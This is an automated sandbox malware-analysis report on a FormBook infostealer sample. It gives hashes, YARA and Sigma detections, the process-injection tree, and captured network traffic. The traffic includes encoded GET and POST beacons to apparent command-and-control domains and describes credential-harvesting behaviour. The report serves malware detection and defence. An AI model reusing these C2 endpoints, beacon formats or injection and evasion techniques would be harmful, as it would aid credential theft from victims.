Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YSjOEAta07.exe

Overview

General Information

Sample name:YSjOEAta07.exe
renamed because original name is a hash value
Original sample name:a16c70f7334f2e73756ea3dc716d70edaf138185d83289bcff6d65d43801408e.exe
Analysis ID:1528155
MD5:eb0f7c655c78976889355aa35a43dd38
SHA1:42238019d0febe523faa8b9d851292090ac9a409
SHA256:a16c70f7334f2e73756ea3dc716d70edaf138185d83289bcff6d65d43801408e
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • YSjOEAta07.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\YSjOEAta07.exe" MD5: EB0F7C655C78976889355AA35A43DD38)
    • svchost.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\YSjOEAta07.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GmuPchEfAM.exe (PID: 1672 cmdline: "C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 7900 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • GmuPchEfAM.exe (PID: 6568 cmdline: "C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7296 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x32d87:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1ae56:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x172c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e3f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x164c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\YSjOEAta07.exe", CommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", ParentImage: C:\Users\user\Desktop\YSjOEAta07.exe, ParentProcessId: 7728, ParentProcessName: YSjOEAta07.exe, ProcessCommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", ProcessId: 7828, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\YSjOEAta07.exe", CommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", ParentImage: C:\Users\user\Desktop\YSjOEAta07.exe, ParentProcessId: 7728, ParentProcessName: YSjOEAta07.exe, ProcessCommandLine: "C:\Users\user\Desktop\YSjOEAta07.exe", ProcessId: 7828, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: YSjOEAta07.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: YSjOEAta07.exeReversingLabs: Detection: 52%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: YSjOEAta07.exeJoe Sandbox ML: detected
            Source: YSjOEAta07.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.1488514641.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455923509.000000000341A000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168342119.00000000006D7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.1488514641.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455923509.000000000341A000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168342119.00000000006D7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GmuPchEfAM.exe, 00000003.00000000.1411401209.00000000002BE000.00000002.00000001.01000000.00000004.sdmp, GmuPchEfAM.exe, 00000008.00000002.3167314647.00000000002BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.1389561003.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1387634356.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1490226852.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002DAE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1488017927.0000000000882000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.1389561003.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1387634356.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000003.1490226852.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002DAE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1488017927.0000000000882000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: replace.exe, 00000004.00000002.3172177851.000000000323C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000000.1558052270.0000000002CAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1780479653.00000000161AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: replace.exe, 00000004.00000002.3172177851.000000000323C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000000.1558052270.0000000002CAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1780479653.00000000161AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0014C230 FindFirstFileW,FindNextFileW,FindClose,4_2_0014C230
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax4_2_00139AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then mov ebx, 00000004h4_2_009304E8
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 4x nop then pop edi8_2_050EB5F3
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 4x nop then xor eax, eax8_2_050F0B07

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.moritynomxd.xyz
            Source: DNS query: www.sterkus.xyz
            Source: Joe Sandbox ViewIP Address: 209.74.95.29 209.74.95.29
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /v5tr/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1tiXGxnpWKIlAMdpeetvztbm0D0P/FQ== HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.moritynomxd.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kmgk/?EjLdUJJ=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzRzkSQpK8SApNFtkA5U4MUp6J2Mz6QQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.kovallo.cloudUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1hpFW51KlNbBS8GqvLsVmQjui7pqzBw==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.sppsuperplast.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /fl4z/?EjLdUJJ=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzcp1KqIPIBJlEGfbNZZvmCXWpEmY6ZQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.tracy.clubUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /ha8h/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX6/3MPvQCQPMFuzfo+VK5cq25Wd2+yKQ== HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.sterkus.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /xx1z/?EjLdUJJ=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIRBLVhXVMqm8ByJItQpJ18i+00NseLA==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.syncnodex.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /lbpf/?EjLdUJJ=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK9wtqtHM6pRVxdkXmhbbPLR4PLxBAP1w==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.galaxyslot88rtp.latUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kzas/?EjLdUJJ=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaJGgKmeWEiKc2IkdQLoOlpJ6MlzQWug==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.warriorsyndrome.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /uxh9/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW1yQztlFWqraTHnGITGOJIT5K53AYpg== HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.ks1x7i.vipUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /ml5l/?EjLdUJJ=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7q40+dEWWJZUlJWs+YYUwQiQqX1T+EQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.pakmartcentral.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kovallo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.sppsuperplast.online
            Source: global trafficDNS traffic detected: DNS query: www.tracy.club
            Source: global trafficDNS traffic detected: DNS query: www.sterkus.xyz
            Source: global trafficDNS traffic detected: DNS query: www.syncnodex.net
            Source: global trafficDNS traffic detected: DNS query: www.galaxyslot88rtp.lat
            Source: global trafficDNS traffic detected: DNS query: www.warriorsyndrome.net
            Source: global trafficDNS traffic detected: DNS query: www.ks1x7i.vip
            Source: global trafficDNS traffic detected: DNS query: www.pakmartcentral.shop
            Source: global trafficDNS traffic detected: DNS query: www.les-massage.online
            Source: unknownHTTP traffic detected: POST /kmgk/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 196Cache-Control: no-cacheHost: www.kovallo.cloudOrigin: http://www.kovallo.cloudReferer: http://www.kovallo.cloud/kmgk/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)Data Raw: 45 6a 4c 64 55 4a 4a 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 39 65 34 37 6a 47 43 55 6f 31 68 65 35 7a 33 65 47 6f 30 79 6a 56 42 77 38 63 64 74 33 71 4c 7a 62 2f 63 7a 66 6e 72 38 70 44 7a 73 70 67 61 57 5a 51 4d 45 30 4d 77 71 68 62 30 4d 45 6a 64 66 43 41 30 5a 6c 33 70 47 65 6a 6f 50 43 5a 48 79 5a 56 4e 33 47 64 67 7a 34 57 73 4d 43 72 65 6e 2b 35 43 76 42 58 31 75 6f 68 52 56 5a 76 4b 70 4a 50 2f 49 2f 52 6a 55 74 72 76 79 70 78 4e 4b 79 46 69 7a 41 4f 52 62 69 39 64 63 6f 58 68 4b 63 6a 61 49 41 46 70 68 54 2f 68 49 43 4c 4c 69 50 51 41 49 38 34 6b 5a 46 64 73 6c 71 53 79 30 Data Ascii: EjLdUJJ=dsMqkxxmQj+V9e47jGCUo1he5z3eGo0yjVBw8cdt3qLzb/czfnr8pDzspgaWZQME0Mwqhb0MEjdfCA0Zl3pGejoPCZHyZVN3Gdgz4WsMCren+5CvBX1uohRVZvKpJP/I/RjUtrvypxNKyFizAORbi9dcoXhKcjaIAFphT/hICLLiPQAI84kZFdslqSy0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:55:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:55:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:55:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:55:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 